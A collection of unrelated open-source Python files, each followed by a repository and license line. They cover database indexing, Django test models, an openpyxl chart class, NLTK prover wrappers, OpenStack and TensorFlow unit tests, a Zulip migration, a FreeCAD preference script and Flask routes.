            thisdist = self.dist(ts, self.rows[pk]['ts'])
            if pkdist is None or thisdist < pkdist:
                closestpk = pk
                pkdist = thisdist
        return closestpk

    def index_bulk(self, pks=None):
        """Rebuild index entries for the given pks (all rows when omitted)."""
        # None or empty -> everything (also avoids a mutable default argument).
        if not pks:
            pks = self.rows
        for pkid in pks:
            self.update_indices(pkid)

    def update_indices(self, pk, oldrow=None):
        """Refresh every index entry for `pk`.

        If oldrow is None, assume all assignments are new; otherwise delete
        stale index entries for any values that changed.
        """
        row = self.rows[pk]
        for field in row:
            val = row[field]
            if field[:5] == 'd_vp-' or (self.schema[field]['index'] is not None and self.schema[field]['type'] in [int, float]):
                if oldrow is not None and field in oldrow and oldrow[field] != val:
                    self.indexes[field].delete(oldrow[field], pk)
                self.indexes[field].put(val, pk)
            elif self.schema[field]['index'] is not None:
                if oldrow is not None and field in oldrow and oldrow[field] != val:
                    self.indexes[field][oldrow[field]].remove(pk)
                self.indexes[field][val].add(pk)

    def select(self, meta, fields, additional=None):
        """Return (pks, metadata) for rows whose metadata matches `meta`.

        meta maps field -> value or {op: value} with ops drawn from OPMAP.
        fields: None -> pks only; [] -> all metadata; [f1, ...] -> those fields.
        additional: optional {'sort_by': '+order'|'-order', 'limit': n}.
        """
        # Enforce appropriate input
        if isinstance(meta, dict) == False:
            raise ValueError('Metadata should be in the form of a dictionary')
        if fields is not None and isinstance(fields, list) == False:
            raise ValueError('Fields should either be in list form or None')
        sort = 0
        limit = None
        # Allows nonsense input into additional, just ignores it
        if additional is not None:
            if 'sort_by' in additional and 'order' in self.schema and self.schema['order']['index'] is not None:
                if additional['sort_by'] == '-order': sort = -1
                if additional['sort_by'] == '+order': sort = 1
            # FIX: `limit` used to require a second key (len(additional) > 1),
            # so {'limit': n} on its own was silently ignored.
            if 'limit' in additional:
                limit = int(additional['limit'])
        # Find primary keys for timeseries which match metadata
        # If no metadata provided, return all rows
        if len(meta) == 0:
            pks = list(self.rows.keys())
        elif len(meta) == 1 and self.pkfield in meta:
            # FIX: used the literal key 'pk', which raised KeyError for any
            # schema whose primary-key field is named differently.
            pks = [meta[self.pkfield]]
        # Otherwise, search for matching rows
        else:
            first = True
            for field in meta:
                # Define operator (For now assuming just one per field)
                if isinstance(meta[field], dict):
                    for opkey in meta[field]:
                        op = OPMAP[opkey]
                        compval = meta[field][opkey]
                else:
                    op = OPMAP['==']
                    compval = meta[field]
                pks_field = []
                if field not in self.schema and field[:5] != 'd_vp-':
                    raise ValueError('Field not supported by schema')
                if field[:5] != 'd_vp-' and self.schema[field]['index'] is None:
                    raise ValueError('May only search by indexed fields or primary key')
                else:
                    if field[:5] == 'd_vp-' or self.schema[field]['type'] in [int, float]:
                        if op == OPMAP['==']:
                            pks_field = self.indexes[field].get(compval)
                        else:
                            pks_field = self.indexes[field].collect(compval, op)
                    else:
                        # Hash index: scan distinct values and apply the operator.
                        for val in self.indexes[field]:
                            if op(val, compval):
                                pks_field = pks_field + list(self.indexes[field][val])
                # Intersect matches across all metadata conditions.
                if first:
                    pks = set(pks_field)
                    first = False
                else:
                    pks = pks.intersection(set(pks_field))
            pks = list(pks)
        # Retrieve appropriate fields
        matchfields = []
        orderfield = []
        if fields is None:
            # Return only pks (still compute the sort key if requested).
            for pk in pks:
                matchfields.append({})
                if 'order' in self.rows[pk] and sort != 0:
                    orderfield.append(self.rows[pk]['order']*sort)
                else:
                    orderfield.append(float('inf'))  # This ensures reasonable behavior
        elif len(fields) == 0:
            # Return all metadata (everything except the raw timeseries).
            for pk in pks:
                pkfields = {}
                pkrow = self.rows[pk]
                for f in pkrow:
                    if f != 'ts':
                        pkfields[f] = pkrow[f]
                matchfields.append(pkfields)
                if 'order' in self.rows[pk] and sort != 0:
                    orderfield.append(self.rows[pk]['order']*sort)
                else:
                    orderfield.append(float('inf'))  # Reasonable behavior if order is undefined for that pk
        else:
            # Return only the specific metadata fields requested.
            for pk in pks:
                pkfields = {}
                pkrow = self.rows[pk]
                for f in fields:
                    if f in pkrow:
                        pkfields[f] = pkrow[f]
                matchfields.append(pkfields)
                if 'order' in self.rows[pk] and sort != 0:
                    orderfield.append(self.rows[pk]['order']*sort)
                else:
                    orderfield.append(float('inf'))
        if sort != 0:
            sortind = [y for (x, y) in sorted(zip(orderfield, range(len(orderfield))))]
            matchfields = [matchfields[i] for i in sortind]
            pks = [y for x, y in sorted(zip(orderfield, pks))]
        if limit is None:
            return pks, matchfields
        else:
            return pks[:limit], matchfields[:limit]
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
class Event(models.Model):
    # The column is renamed because Oracle can have problems with a
    # column named "date".
    date = models.DateField(db_column="event_date")
class Parent(models.Model):
    # Simple named model; target of the foreign key on Child.
    name = models.CharField(max_length=128)
class Child(models.Model):
    # FK is non-editable and nullable; name and age are optional.
    parent = models.ForeignKey(Parent, editable=False, null=True)
    name = models.CharField(max_length=30, blank=True)
    age = models.IntegerField(null=True, blank=True)
class Genre(models.Model):
    # Simple named model; referenced by Band.genres (many-to-many).
    name = models.CharField(max_length=20)
class Band(models.Model):
    # Band with a plain many-to-many relationship to Genre.
    name = models.CharField(max_length=20)
    nr_of_members = models.PositiveIntegerField()
    genres = models.ManyToManyField(Genre)
@python_2_unicode_compatible
class Musician(models.Model):
    # Named model whose string representation is its name.
    name = models.CharField(max_length=30)
    def __str__(self):
        return self.name
@python_2_unicode_compatible
class Group(models.Model):
    # Group of Musicians related through the explicit Membership model.
    name = models.CharField(max_length=30)
    members = models.ManyToManyField(Musician, through='Membership')
    def __str__(self):
        return self.name
class Membership(models.Model):
    # Through-model for Group.members, carrying a per-membership role.
    music = models.ForeignKey(Musician)
    group = models.ForeignKey(Group)
    role = models.CharField(max_length=15)
class Quartet(Group):
    # Multi-table-inheritance subclass of Group (no extra fields).
    pass
class ChordsMusician(Musician):
    # Multi-table-inheritance subclass of Musician (no extra fields).
    pass
class ChordsBand(models.Model):
    # Band of ChordsMusicians related through the explicit Invitation model.
    name = models.CharField(max_length=30)
    members = models.ManyToManyField(ChordsMusician, through='Invitation')
class Invitation(models.Model):
    # Through-model for ChordsBand.members, carrying the player's instrument.
    player = models.ForeignKey(ChordsMusician)
    band = models.ForeignKey(ChordsBand)
    instrument = models.CharField(max_length=15)
class Swallow(models.Model):
    # Model with a default ordering declared in Meta: by speed, then load.
    origin = models.CharField(max_length=255)
    load = models.FloatField()
    speed = models.FloatField()
    class Meta:
        ordering = ('speed', 'load')
class UnorderedObject(models.Model):
    """
    Model without any defined `Meta.ordering`.
    Refs #17198.
    """
    # Field intentionally shares its name with the builtin `bool`.
    bool = models.BooleanField(default=True)
class OrderedObjectManager(models.Manager):
    # Manager whose default queryset is ordered by `number`.
    # NOTE(review): `get_query_set` is the old (pre-Django-1.6) manager hook
    # name used by this codebase — confirm the Django version before renaming.
    def get_query_set(self):
        return super(OrderedObjectManager, self).get_query_set().order_by('number')
class OrderedObject(models.Model):
    """
    Model with Manager that defines a default order.
    Refs #17198.
    """
    name = models.CharField(max_length=255)
    # Field intentionally shares its name with the builtin `bool`.
    bool = models.BooleanField(default=True)
    number = models.IntegerField(default=0, db_column='number_val')
    objects = OrderedObjectManager()
| openhatch/new-mini-tasks | vendor/packages/Django/tests/regressiontests/admin_changelist/models.py | Python | apache-2.0 | 2,489 |
from __future__ import absolute_import
# Copyright (c) 2010-2015 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: see AUTHORS file
from openpyxl.drawing import Drawing, Shape
from .legend import Legend
from .series import Series
class Chart(object):
    """ raw chart class """

    GROUPING = 'standard'
    TYPE = None

    def mymax(self, values):
        """Maximum of *values*, ignoring None entries."""
        # was max([...]): no need to materialize a throwaway list
        return max(x for x in values if x is not None)

    def mymin(self, values):
        """Minimum of *values*, ignoring None entries."""
        return min(x for x in values if x is not None)

    def __init__(self):
        self.series = []
        self._series = self.series  # backwards compatible
        # public api
        self.legend = Legend()
        self.show_legend = True
        self.lang = 'en-GB'
        self.title = ''
        self.print_margins = dict(b=.75, l=.7, r=.7, t=.75, header=0.3, footer=.3)
        # the containing drawing
        self.drawing = Drawing()
        self.drawing.left = 10
        self.drawing.top = 400
        self.drawing.height = 400
        self.drawing.width = 800
        # the offset for the plot part in percentage of the drawing size
        self.width = .6
        self.height = .6
        # Seed the clamped margin: the second assignment reads the
        # `margin_top` property, which clamps the initial value of 1 down to
        # the drawing's real maximum.
        self._margin_top = 1
        self._margin_top = self.margin_top
        self._margin_left = 0
        # the user defined shapes
        self.shapes = []
        self._shapes = self.shapes  # backwards compatible

    def append(self, obj):
        """Add a series or a shape"""
        if isinstance(obj, Series):
            self.series.append(obj)
        elif isinstance(obj, Shape):
            self.shapes.append(obj)

    # legacy aliases kept for backwards compatibility
    add_shape = add_serie = add_series = append

    def __iter__(self):
        return iter(self.series)

    def get_y_chars(self):
        """ estimate nb of chars for y axis """
        _max = max([s.max() for s in self])
        return len(str(int(_max)))

    @property
    def margin_top(self):
        """ get margin in percent """
        return min(self._margin_top, self._get_max_margin_top())

    @margin_top.setter
    def margin_top(self, value):
        """ set base top margin"""
        self._margin_top = value

    def _get_max_margin_top(self):
        # space left above the plot once the axis-label band is reserved
        mb = Shape.FONT_HEIGHT + Shape.MARGIN_BOTTOM
        plot_height = self.drawing.height * self.height
        return float(self.drawing.height - plot_height - mb) / self.drawing.height

    @property
    def margin_left(self):
        return max(self._get_min_margin_left(), self._margin_left)

    @margin_left.setter
    def margin_left(self, value):
        self._margin_left = value

    def _get_min_margin_left(self):
        # width needed for the y-axis tick labels, as a fraction of drawing width
        ml = (self.get_y_chars() * Shape.FONT_WIDTH) + Shape.MARGIN_LEFT
        return float(ml) / self.drawing.width
| maheshcn/memory-usage-from-ldfile | openpyxl/charts/chart.py | Python | gpl-2.0 | 3,792 |
# -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in module root
# directory
##############################################################################
from . import account_invoice_refund
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | adhoc-dev/odoo-addons | account_refund_invoice_fix/__init__.py | Python | agpl-3.0 | 373 |
# Natural Language Toolkit: Interface to Theorem Provers
#
# Author: Dan Garrette <dhgarrette@gmail.com>
# Ewan Klein <ewan@inf.ed.ac.uk>
#
# URL: <http://nltk.sf.net>
# For license information, see LICENSE.TXT
from nltk.sem.logic import ApplicationExpression, Operator, LogicParser
import tableau
import prover9
import mace
"""
A wrapper module that calls theorem provers and model builders.
"""
def get_prover(goal=None, assumptions=None, prover_name='Prover9'):
    """
    @param goal: Input expression to prove
    @type goal: L{logic.Expression}
    @param assumptions: Input expressions to use as assumptions in the proof
    @type assumptions: L{list} of logic.Expression objects
    @param prover_name: Name of the prover backend: 'Prover9' or 'tableau'
    @type prover_name: C{str}
    """
    # FIX: mutable default argument ([]) replaced with the None idiom.
    if assumptions is None:
        assumptions = []
    if prover_name.lower() == 'tableau':
        prover_module = tableau.Tableau
    elif prover_name.lower() == 'prover9':
        prover_module = prover9.Prover9
    else:
        # FIX: an unrecognized name used to fall through to an
        # UnboundLocalError; raise a clear error instead.
        raise ValueError('Unknown prover: %s' % prover_name)
    return prover_module(goal, assumptions)
def get_model_builder(goal=None, assumptions=None, model_builder_name='Mace'):
    """
    @param goal: Input expression to prove
    @type goal: L{logic.Expression}
    @param assumptions: Input expressions to use as assumptions in the proof
    @type assumptions: L{list} of logic.Expression objects
    @param model_builder_name: Name of the backend; only 'Mace' is supported
    @type model_builder_name: C{str}
    """
    # FIX: mutable default argument ([]) replaced with the None idiom.
    if assumptions is None:
        assumptions = []
    if model_builder_name.lower() == 'mace':
        builder_module = mace.Mace
    else:
        # FIX: an unrecognized name used to fall through to an
        # UnboundLocalError; raise a clear error instead.
        raise ValueError('Unknown model builder: %s' % model_builder_name)
    return builder_module(goal, assumptions)
def demo_drt_glue_remove_duplicates(show_example=-1):
    """Parse a fixed list of sentences with the DRT-glue pipeline and print
    each reading (simplified, anaphora resolved).

    show_example selects one sentence by index; -1 (the default) runs all.
    (Python 2 print statements; requires nltk_contrib.)
    """
    from nltk_contrib.gluesemantics import drt_glue
    examples = ['David sees Mary',
                'David eats a sandwich',
                'every man chases a dog',
                'John chases himself',
                'John likes a cat',
                'John likes every cat',
                'he likes a dog',
                'a dog walks and he leaves']
    example_num = 0
    hit = False
    for sentence in examples:
        if example_num==show_example or show_example==-1:
            print '[[[Example %s]]] %s' % (example_num, sentence)
            readings = drt_glue.parse_to_meaning(sentence, True)
            for j in range(len(readings)):
                reading = readings[j].simplify().resolve_anaphora()
                print reading
            print ''
            hit = True
        example_num += 1
    if not hit:
        # The requested index was out of range for the examples list.
        print 'example not found'
def demo():
    """Demo: prove a biconditional with both provers, run the DRT-glue demo,
    then check the Socrates syllogism with Prover9 and build (counter)models
    with Mace.  (Python 2 prints; requires the Prover9/Mace binaries.)
    """
    from nltk_contrib.drt import DRT
    DRT.testTp_equals()
    print '\n'
    lp = LogicParser()
    a = lp.parse(r'some x.((man x) and (walks x))')
    b = lp.parse(r'some x.((walks x) and (man x))')
    bicond = ApplicationExpression(ApplicationExpression(Operator('iff'), a), b)
    print "Trying to prove:\n '%s <-> %s'" % (a.infixify(), b.infixify())
    print 'tableau: %s' % get_prover(bicond, prover_name='tableau').prove()
    print 'Prover9: %s' % get_prover(bicond, prover_name='Prover9').prove()
    print '\n'
    demo_drt_glue_remove_duplicates()
    # Socrates syllogism: c1 should be provable from [a, b]; c2 should not.
    lp = LogicParser()
    a = lp.parse(r'all x.((man x) implies (mortal x))')
    b = lp.parse(r'(man socrates)')
    c1 = lp.parse(r'(mortal socrates)')
    c2 = lp.parse(r'(not (mortal socrates))')
    print get_prover(c1, [a,b], 'prover9').prove()
    print get_prover(c2, [a,b], 'prover9').prove()
    print get_model_builder(c1, [a,b], 'mace').build_model()
    print get_model_builder(c2, [a,b], 'mace').build_model()
if __name__ == '__main__':
    demo()
| hectormartinez/rougexstem | taln2016/icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk/inference/inference.py | Python | apache-2.0 | 3,449 |
# Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import mock
from rally import exceptions
from rally.plugins.openstack.wrappers import cinder as cinder_wrapper
from tests.unit import test
@ddt.ddt
class CinderWrapperTestCase(test.ScenarioTestCase):
    """Checks that wrap() picks the wrapper class matching the client version."""

    @ddt.data(
        {"version": "1", "expected_class": cinder_wrapper.CinderV1Wrapper},
        {"version": "2", "expected_class": cinder_wrapper.CinderV2Wrapper}
    )
    @ddt.unpack
    def test_wrap(self, version, expected_class):
        client = mock.MagicMock()
        client.choose_version.return_value = version
        self.assertIsInstance(cinder_wrapper.wrap(client, mock.Mock()),
                              expected_class)

    @mock.patch("rally.plugins.openstack.wrappers.cinder.LOG")
    def test_wrap_wrong_version(self, mock_log):
        client = mock.MagicMock()
        client.choose_version.return_value = "dummy"
        self.assertRaises(exceptions.InvalidArgumentsException,
                          cinder_wrapper.wrap, client, mock.Mock())
        # FIX: `mock_log.warning.mock_called` auto-created a brand-new
        # (always truthy) Mock attribute, so this assertion could never
        # fail; `.called` is the real flag set when the mock is invoked.
        self.assertTrue(mock_log.warning.called)
class CinderV1WrapperTestCase(test.TestCase):
    # Exercises CinderV1Wrapper: the v1 API uses the display_name /
    # display_description keyword spellings.
    def setUp(self):
        super(CinderV1WrapperTestCase, self).setUp()
        self.client = mock.MagicMock()
        self.client.choose_version.return_value = "1"
        self.owner = mock.Mock()
        self.wrapped_client = cinder_wrapper.wrap(self.client, self.owner)
    def test_create_volume(self):
        # The wrapper must replace the caller-supplied name with a generated one.
        self.wrapped_client.create_volume(1, display_name="fake_vol")
        self.client.return_value.volumes.create.assert_called_once_with(
            1, display_name=self.owner.generate_random_name.return_value)
    def test_update_volume(self):
        # Name is regenerated; other kwargs pass through untouched.
        self.wrapped_client.update_volume("fake_id", display_name="fake_vol",
                                          display_description="_updated")
        self.client.return_value.volumes.update.assert_called_once_with(
            "fake_id",
            display_name=self.owner.generate_random_name.return_value,
            display_description="_updated")
    def test_create_snapshot(self):
        # Snapshot names are regenerated the same way as volume names.
        self.wrapped_client.create_snapshot("fake_id",
                                            display_name="fake_snap")
        (self.client.return_value.volume_snapshots.create.
         assert_called_once_with(
             "fake_id",
             display_name=self.owner.generate_random_name.return_value))
class CinderV2WrapperTestCase(test.TestCase):
    # Exercises CinderV2Wrapper: the v2 API uses the plain name /
    # description keyword spellings.
    def setUp(self):
        super(CinderV2WrapperTestCase, self).setUp()
        self.client = mock.MagicMock()
        self.client.choose_version.return_value = "2"
        self.owner = mock.Mock()
        self.wrapped_client = cinder_wrapper.wrap(self.client, self.owner)
    def test_create_volume(self):
        # The wrapper must replace the caller-supplied name with a generated one.
        self.wrapped_client.create_volume(1, name="fake_vol")
        self.client.return_value.volumes.create.assert_called_once_with(
            1, name=self.owner.generate_random_name.return_value)
    def test_create_snapshot(self):
        # Snapshot names are regenerated the same way as volume names.
        self.wrapped_client.create_snapshot("fake_id", name="fake_snap")
        (self.client.return_value.volume_snapshots.create.
         assert_called_once_with(
             "fake_id",
             name=self.owner.generate_random_name.return_value))
    def test_update_volume(self):
        # Name is regenerated; other kwargs pass through untouched.
        self.wrapped_client.update_volume("fake_id", name="fake_vol",
                                          description="_updated")
        self.client.return_value.volumes.update.assert_called_once_with(
            "fake_id", name=self.owner.generate_random_name.return_value,
            description="_updated")
| yeming233/rally | tests/unit/plugins/openstack/wrappers/test_cinder.py | Python | apache-2.0 | 4,204 |
# Generated by Django 2.2.12 on 2020-05-01 16:22
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds the per-user ``presence_enabled`` boolean flag.  Defaults to
    # True so that all existing users keep their current behavior.

    dependencies = [
        ('zerver', '0279_message_recipient_subject_indexes'),
    ]

    operations = [
        migrations.AddField(
            model_name='userprofile',
            name='presence_enabled',
            field=models.BooleanField(default=True),
        ),
    ]
| showell/zulip | zerver/migrations/0280_userprofile_presence_enabled.py | Python | apache-2.0 | 416 |
#***************************************************************************
#* *
#* Copyright (c) 2012 Yorik van Havre <yorik@uncreated.net> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
import FreeCAD

# Flip the Start workbench preference so the Start page is allowed to
# download content from the network.
start_prefs = FreeCAD.ParamGet("User parameter:BaseApp/Preferences/Mod/Start")
start_prefs.SetBool("AllowDownload", True)
| sanguinariojoe/FreeCAD | src/Mod/Start/StartPage/EnableDownload.py | Python | lgpl-2.1 | 1,734 |
"""
This module contains the logic for handling the user specials model in the template
"""
from __future__ import unicode_literals, print_function
import json
import logging.config
from flask import request, jsonify, Blueprint
from flask_login import current_user
from google.appengine.ext import ndb
from handlers.query import Query
from handlers.utils import date_handler, to_json
from models.models import Issue
# Module-level logger plus the blueprint under which all routes below are
# registered.
logger = logging.getLogger(__name__)
user_specials_api = Blueprint('user_specials_api', __name__)
@user_specials_api.route('/', methods=['POST'])
@user_specials_api.route('/index.html', methods=['POST'])
def get_specials():
    """
    Retrieves user's special issues.
    :returns: JSON object with user's special issues object
    """
    # Both routes only accept POST, so this guard is effectively always
    # true; kept to preserve the original behavior.
    if request.method == 'POST':
        specials = Query().get_specials()
        return json.dumps(to_json(specials), default=date_handler)
@user_specials_api.route('/user/add_special_issue/', methods=['POST'])
def add_special_issue():
    """
    Adds requested issue via POST to the user's specials list
    :returns: JSON object with operation outcome
    """
    my_user = current_user
    issue_title = request.form['special_issue']
    special_id = ndb.Key(Issue, issue_title)
    logger.debug("received " + str(request))
    if special_id not in my_user.specials_list:
        my_user.specials_list.append(special_id)
        my_user.put()
        logger.debug("user id:" + str(my_user.key) + " special added: " + issue_title)
        return jsonify(content=issue_title + " added")
    else:
        # Bug fix: the old log message said "non found" even though this
        # branch means the issue was already present in the specials list.
        logger.debug("user id:" + str(my_user.key) + " special " + issue_title + " already added")
        return jsonify(content=issue_title + " already added")
@user_specials_api.route('/user/remove_special_issue/', methods=['POST'])
def remove_special_issue():
    """
    Removes requested issue via POST from the user's specials list
    :returns: JSON object with operation outcome
    """
    user = current_user
    issue_title = request.form['special_issue']
    special_id = ndb.Key(Issue, issue_title)
    logger.debug("received " + str(request))
    # Guard clause: nothing to remove if the issue isn't in the list.
    if special_id not in user.specials_list:
        logger.debug("user id:" + str(user.key) + " special " + issue_title + " not found")
        return jsonify(content=issue_title + " not found")
    user.specials_list.remove(special_id)
    user.put()
    logger.debug("user id:" + str(user.key) + " special " + issue_title + " removed ")
    return jsonify(content=issue_title + " removed")
| aaleotti-unimore/ComicsScraper | views/user_specials.py | Python | apache-2.0 | 2,561 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for object_detection.trainer."""
import tensorflow as tf
from google.protobuf import text_format
from object_detection import trainer
from object_detection.core import losses
from object_detection.core import model
from object_detection.core import standard_fields as fields
from object_detection.protos import train_pb2
# Number of classes shared by the fake model and the random labels below.
NUMBER_OF_CLASSES = 2


def get_input_function():
  """A function to get test inputs. Returns an image with one box.

  The returned dict mimics a decoded training example: a random 32x32x3
  float image, one random class label in [0, NUMBER_OF_CLASSES) and one
  box with coordinates drawn from [0.4, 0.6).
  """
  image = tf.random_uniform([32, 32, 3], dtype=tf.float32)
  class_label = tf.random_uniform(
      [1], minval=0, maxval=NUMBER_OF_CLASSES, dtype=tf.int32)
  box_label = tf.random_uniform(
      [1, 4], minval=0.4, maxval=0.6, dtype=tf.float32)
  return {
      fields.InputDataFields.image: image,
      fields.InputDataFields.groundtruth_classes: class_label,
      fields.InputDataFields.groundtruth_boxes: box_label
  }
class FakeDetectionModel(model.DetectionModel):
  """A simple (and poor) DetectionModel for use in test."""

  def __init__(self):
    super(FakeDetectionModel, self).__init__(num_classes=NUMBER_OF_CLASSES)
    self._classification_loss = losses.WeightedSigmoidClassificationLoss(
        anchorwise_output=True)
    self._localization_loss = losses.WeightedSmoothL1LocalizationLoss(
        anchorwise_output=True)

  def preprocess(self, inputs):
    """Input preprocessing, resizes images to 28x28.

    Args:
      inputs: a [batch, height_in, width_in, channels] float32 tensor
        representing a batch of images with values between 0 and 255.0.

    Returns:
      preprocessed_inputs: a [batch, 28, 28, channels] float32 tensor.
    """
    return tf.image.resize_images(inputs, [28, 28])

  def predict(self, preprocessed_inputs):
    """Prediction tensors from inputs tensor.

    Args:
      preprocessed_inputs: a [batch, 28, 28, channels] float32 tensor.

    Returns:
      prediction_dict: a dictionary holding prediction tensors to be
        passed to the Loss or Postprocess functions.
    """
    # A single fully-connected layer each for class scores and box
    # encodings, reshaped to one prediction per (example, anchor).
    flattened_inputs = tf.contrib.layers.flatten(preprocessed_inputs)
    class_prediction = tf.contrib.layers.fully_connected(
        flattened_inputs, self._num_classes)
    box_prediction = tf.contrib.layers.fully_connected(flattened_inputs, 4)
    return {
        'class_predictions_with_background': tf.reshape(
            class_prediction, [-1, 1, self._num_classes]),
        'box_encodings': tf.reshape(box_prediction, [-1, 1, 4])
    }

  def postprocess(self, prediction_dict, **params):
    """Convert predicted output tensors to final detections. Unused.

    Args:
      prediction_dict: a dictionary holding prediction tensors.
      **params: Additional keyword arguments for specific implementations of
        DetectionModel.

    Returns:
      detections: a dictionary with empty fields.
    """
    return {
        'detection_boxes': None,
        'detection_scores': None,
        'detection_classes': None,
        'num_detections': None
    }

  def loss(self, prediction_dict):
    """Compute scalar loss tensors with respect to provided groundtruth.

    Calling this function requires that groundtruth tensors have been
    provided via the provide_groundtruth function.

    Args:
      prediction_dict: a dictionary holding predicted tensors

    Returns:
      a dictionary mapping strings (loss names) to scalar tensors representing
      loss values.
    """
    batch_reg_targets = tf.stack(
        self.groundtruth_lists(fields.BoxListFields.boxes))
    batch_cls_targets = tf.stack(
        self.groundtruth_lists(fields.BoxListFields.classes))
    # All anchors are weighted equally.
    weights = tf.constant(
        1.0, dtype=tf.float32,
        shape=[len(self.groundtruth_lists(fields.BoxListFields.boxes)), 1])
    location_losses = self._localization_loss(
        prediction_dict['box_encodings'], batch_reg_targets,
        weights=weights)
    cls_losses = self._classification_loss(
        prediction_dict['class_predictions_with_background'], batch_cls_targets,
        weights=weights)
    loss_dict = {
        'localization_loss': tf.reduce_sum(location_losses),
        'classification_loss': tf.reduce_sum(cls_losses),
    }
    return loss_dict

  def restore_fn(self, checkpoint_path, from_detection_checkpoint=True):
    """Return callable for loading a checkpoint into the tensorflow graph.

    Args:
      checkpoint_path: path to checkpoint to restore.
      from_detection_checkpoint: whether to restore from a full detection
        checkpoint (with compatible variable names) or to restore from a
        classification checkpoint for initialization prior to training.

    Returns:
      a callable which takes a tf.Session and does nothing.
    """
    # The fake model has nothing to restore, so the callable is a no-op.
    def restore(unused_sess):
      return
    return restore
class TrainerTest(tf.test.TestCase):
  # Smoke-tests trainer.train() end to end with the fake model above.

  def test_configure_trainer_and_train_two_steps(self):
    # Minimal config: Adam with a constant learning rate, two data
    # augmentation options, and only two training steps.
    train_config_text_proto = """
    optimizer {
      adam_optimizer {
        learning_rate {
          constant_learning_rate {
            learning_rate: 0.01
          }
        }
      }
    }
    data_augmentation_options {
      random_adjust_brightness {
        max_delta: 0.2
      }
    }
    data_augmentation_options {
      random_adjust_contrast {
        min_delta: 0.7
        max_delta: 1.1
      }
    }
    num_steps: 2
    """
    train_config = train_pb2.TrainConfig()
    text_format.Merge(train_config_text_proto, train_config)
    train_dir = self.get_temp_dir()
    # Single-clone, CPU-only, chief-worker training run.
    trainer.train(create_tensor_dict_fn=get_input_function,
                  create_model_fn=FakeDetectionModel,
                  train_config=train_config,
                  master='',
                  task=0,
                  num_clones=1,
                  worker_replicas=1,
                  clone_on_cpu=True,
                  ps_tasks=0,
                  worker_job_name='worker',
                  is_chief=True,
                  train_dir=train_dir)
# Run all test cases in this module when executed directly.
if __name__ == '__main__':
  tf.test.main()
| unnikrishnankgs/va | venv/lib/python3.5/site-packages/tensorflow/models/object_detection/trainer_test.py | Python | bsd-2-clause | 6,635 |
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tool for automatically creating .nmf files from .nexe/.pexe executables.
As well as creating the nmf file this tool can also find and stage
any shared libraries dependancies that the executables might have.
"""
import errno
import json
import optparse
import os
import re
import shutil
import struct
import subprocess
import sys
import getos
import quote
# Bail out early on interpreters that are too old for this script.
if sys.version_info < (2, 6, 0):
  # Bug fix: message previously read "required run" (missing "to").
  sys.stderr.write("python 2.6 or later is required to run this script\n")
  sys.exit(1)
# Matches "NEEDED" lines in `objdump -p` output, capturing the library name.
NeededMatcher = re.compile('^ *NEEDED *([^ ]+)\n$')
# Matches the "<file>: file format <format>" banner objdump prints per file.
FormatMatcher = re.compile('^(.+):\\s*file format (.+)\n$')

SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))

# Maps objdump "file format" strings to nmf architecture names.
OBJDUMP_ARCH_MAP = {
    # Names returned by Linux's objdump:
    'elf64-x86-64': 'x86-64',
    'elf32-i386': 'x86-32',
    'elf32-little': 'arm',
    'elf32-littlearm': 'arm',
    # Names returned by old x86_64-nacl-objdump:
    'elf64-nacl': 'x86-64',
    'elf32-nacl': 'x86-32',
    # Names returned by new x86_64-nacl-objdump:
    'elf64-x86-64-nacl': 'x86-64',
    'elf32-x86-64-nacl': 'x86-64',
    'elf32-i386-nacl': 'x86-32',
}

